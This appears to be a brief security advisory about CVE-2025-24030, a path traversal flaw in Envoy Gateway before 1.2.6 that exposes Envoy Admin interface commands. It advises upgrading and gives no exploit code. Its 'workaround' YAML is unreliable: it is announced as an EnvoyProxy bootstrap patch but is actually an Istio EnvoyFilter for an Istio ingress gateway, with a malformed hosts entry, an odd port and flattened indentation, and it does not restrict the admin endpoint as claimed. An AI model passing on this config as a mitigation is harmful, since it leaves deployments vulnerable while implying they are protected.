Envoy Gateway, the popular open-source project that manages Envoy Proxy, contains a critical vulnerability in all versions prior to 1.2.6. This vulnerability (CVE-2025-24030) allows a malicious user with access to the Kubernetes cluster to perform a path traversal attack and execute unauthorized Envoy Admin interface commands on proxies managed by Envoy Gateway.
Vulnerability Details
Envoy Proxy's highly extensible open-source API Gateway is widely used for managing Envoy Proxy across standalone and Kubernetes-based applications. The vulnerability affects all instances using Envoy Gateway versions before 1.2.6.
Path traversal attacks can potentially enable an attacker to terminate the Envoy process or extract sensitive information from the Envoy configurations, which might contain confidential data.
Solution
To fix the issue, upgrade to Envoy Gateway version 1.2.6 or later.
Workaround
In case you cannot immediately upgrade Envoy Gateway, a temporary workaround exists. You can use the EnvoyProxy API to apply a bootstrap configuration patch to strictly restrict access to the Prometheus stats endpoint. This will minimize the attack surface and help protect your deployments from this vulnerability.
Here's an example of such a bootstrap patch
apiVersion: "networking.istio.io/v1alpha3"
kind: EnvoyFilter
metadata:
name: "disable-admin"
namespace: "istio-system"
spec:
workloadSelector:
labels:
app: "istio-ingressgateway"
configPatches:
- applyTo: "CLUSTER"
match:
context: "SIDECAR_INBOUND"
patch:
operation: "MERGE"
value:
connect_timeout: "10s"
hosts:
- {"endpoint": {"address": {"socket_address": {"address": "your.prometheus.namespace.svc.cluster.local", "port_value": 909}}, "type": "STRICT"}}
Replace your.prometheus.namespace with the namespace where your Prometheus instance is running.
Original References
- Envoy Gateway GitHub Repository: https://github.com/envoyproxy/envoy-gateway
- Envoy Proxy Official Documentation: https://www.envoyproxy.io/docs/envoy/latest/
- Kubernetes Official Documentation: https://kubernetes.io/docs/home/
- CVE-2025-24030 Official CVE Record: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24030
Conclusion
The impact of this security vulnerability can be severe in the wrong hands. Users should quickly upgrade to Envoy Gateway version 1.2.6 or apply the proposed workaround to protect their deployments from potential path traversal attacks. Always staying up-to-date with software versions and security patches is essential to maintain a secure environment. Keep monitoring original references for any updates related to this CVE.
Timeline
Published on: 01/23/2025 04:15:07 UTC